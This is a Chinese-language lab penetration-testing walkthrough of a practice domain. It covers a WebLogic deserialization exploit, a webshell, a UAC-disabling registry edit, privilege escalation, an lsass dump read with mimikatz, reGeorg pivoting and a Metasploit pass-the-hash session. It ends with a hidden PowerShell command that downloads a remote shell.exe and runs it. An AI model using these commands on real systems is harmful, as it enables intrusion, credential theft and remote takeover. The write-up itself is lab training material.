前言:
一开始是全使用msf打通的,后面使用了cs打通,所以思路可能有点乱。。。
按照作者给的配置情况,配置完成后,启动weblogic服务。
根据cve_2019_2725反序列化漏洞,检查出存在漏洞。
直接上传冰蝎木马。
成功连接上冰蝎。
后使用冰蝎的反弹shell模块,成功反弹到meterpreter
通过ip发现存在另一个网端。
通过ipconfig /all
发现存在域,域名为de1ay.com
通过nslookup -type=SRV _ldap._tcp.corp
定位域控,域控为10.10.10.10
远程桌面3389度端口开放
systeminfo发现信息
并且机器只安装了三个补丁‘
[01]: KB2999226
[02]: KB958488
[03]: KB976902
使用cs进行内网探测发现内网三台机器
思路一:
tasklist查看服务发现安装了360杀毒
我们来进行提权操作
通过补丁对比,我们发现ms_15_051
可使用,于是我们用其进行提权。
这里不知道怎么回事,一直报错,可能是uac搞的事,于是我们进行bypassuac,在shell中输入C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
然后shutdown /r
重启计算机,等待管理员的再一次登陆。
随后在进行提权吧,这种思路,太过于鸡肋,所以实战中还是不要使用。
后面使用cs,直接使用自带的提权使用ms_14_058
提权成功,果然还是cs大法好。
思路二:抓明文
另外我们还可以通过procdump lsess.exe进程数据离线免杀抓取明文,从而绕过360的监控。
上传procdump到机器,执行procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
将lsass.dmp下载下来。
本地的mimikatz.exe执行
- sekurlsa::minidump lsass.dmp
- sekurlsa::logonpasswords full
成功抓取明文密码
由于前面我们发现3389端口开放,于是直接上3389。这里我们有个思路,连上3389后,探测内网机器3389是否也可登陆,于是我们见可以使用我们得到的账户密码,进行3389登陆,也就是3389+3389+n。但是这里我们登陆不上3389,提示:未授予用户在此计算机上的请求登录类型,说明web机的本地策略中拒绝了我们的账户。
那我们上传regeorg进内网。
这里的weblogic asynchttp://192.168.70.129:7001//_async/
的路径为C:/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/
连接上regeorg后,直接使用proxychains 进行3389连接PC机器(10.10.10.201)。
思路三 PTH
其实这里还有种思路,直接使用前面得到的域管理员密码进行PTH
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > set SMBPass f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24
SMBPass => f67ce55ac831223dc187b8085fe1d9df:161cff084477fe596a5db81874498a24
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.201
rhost => 10.10.10.201
msf5 exploit(windows/smb/psexec) > run
[*] 10.10.10.201:445 - Connecting to the server...
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.201:445-<><>-OK
[*] 10.10.10.201:445 - Authenticating to 10.10.10.201:445|de1ay as user 'administrator'...
[*] 10.10.10.201:445 - Selecting PowerShell target
[*] 10.10.10.201:445 - Executing the payload...
[+] 10.10.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.10.10.201:4444
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.201:4444-<><>-OK
[*] Sending stage (180291 bytes) to 10.10.10.201
[*] Meterpreter session 1 opened (127.0.0.1:59608 -> 127.0.0.1:8888) at 2020-02-10 11:38:47 -0500
meterpreter >
现在已经拿到了PC机器了,且为SYSTEM权限。
同样我们也可以使用PTH拿到域控机器的SYSTEM权限。
思路四:
因为前面我们已经得到了明文密码,所以可以直接使用微软提供的psexec.exe工具,得到system权限的cmd,后可搭建ftp服务器或者可通过proxychains -m SimpleHTTPServer 80
,通过poweshellcmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://192.168.85.159:7777/shell.exe','shell.exe');start-process shell.exe
下载木马执行,最终反弹到meterpreter上,且权限为system.